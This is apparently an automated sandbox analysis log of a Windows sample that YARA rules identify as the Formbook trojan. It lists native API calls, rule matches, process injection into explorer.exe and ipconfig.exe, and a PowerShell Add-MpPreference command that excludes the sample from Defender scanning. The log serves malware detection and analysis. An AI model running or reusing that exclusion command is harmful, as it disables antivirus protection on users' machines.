            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A320 NtCreateFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A3D0 NtReadFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A450 NtClose
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A500 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A31B NtCreateFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A44A NtClose
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_0041A4FA NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22B60 NtClose,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22F90 NtProtectVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A24340 NtSetContextThread
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A24650 NtSuspendThread
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22BA0 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22B80 NtQueryInformationFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22BE0 NtQueryValueKey
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22AB0 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22AF0 NtWriteFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22DB0 NtEnumerateKey
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22D00 NtSetInformationFile
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22CF0 NtOpenProcess
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22CC0 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22C00 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22C60 NtCreateKey
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22FA0 NtQuerySection
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22F60 NtCreateProcessEx
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22EE0 NtQueueApcThread
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22E30 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A23090 NtSetValueKey
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A23010 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A235C0 NtCreateMutant
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A239B0 NtGetContextThread
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A23D10 NtOpenProcessToken
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A23D70 NtOpenThread
            Source: C:\Windows\explorer.exe | Code function: 6_2_115DEE12 NtProtectVirtualMemory
            Source: C:\Windows\explorer.exe | Code function: 6_2_115DD232 NtCreateFile
            Source: C:\Windows\explorer.exe | Code function: 6_2_115DEE0A NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A4340 NtSetContextThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A4650 NtSuspendThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A39B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_038A3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00E4A3D0 NtReadFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00E4A320 NtCreateFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00E4A450 NtClose
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00E4A31B NtCreateFile
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00E4A44A NtClose
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_03699BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_0369A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_03699BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_0369A042 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038A5130 appears 58 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0385B970 appears 280 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038EF290 appears 105 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 038B7E54 appears 102 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A5EA12 appears 86 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 019DB970 appears 280 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A37E54 appears 102 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A25130 appears 58 times
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: String function: 01A6F290 appears 105 times
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1546274568.0000000007120000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000000.1522481407.0000000000672000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJHk.exe6 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1538691770.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.0000000001ADD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001937000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001722000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe | Binary or memory string: OriginalFilenameJHk.exe6 vs JHnNxt6Pnb.exe
            Source: JHnNxt6Pnb.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d | os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 964, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: ipconfig.exe PID: 5460, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: JHnNxt6Pnb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, VB0K75NHNNnsBGRN1j.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, VB0K75NHNNnsBGRN1j.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, VB0K75NHNNnsBGRN1j.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@525/6@11/1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JHnNxt6Pnb.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d0szuis.42b.ps1
            Source: JHnNxt6Pnb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JHnNxt6Pnb.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: JHnNxt6Pnb.exe | ReversingLabs: Detection: 68%
            Source: unknown | Process created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
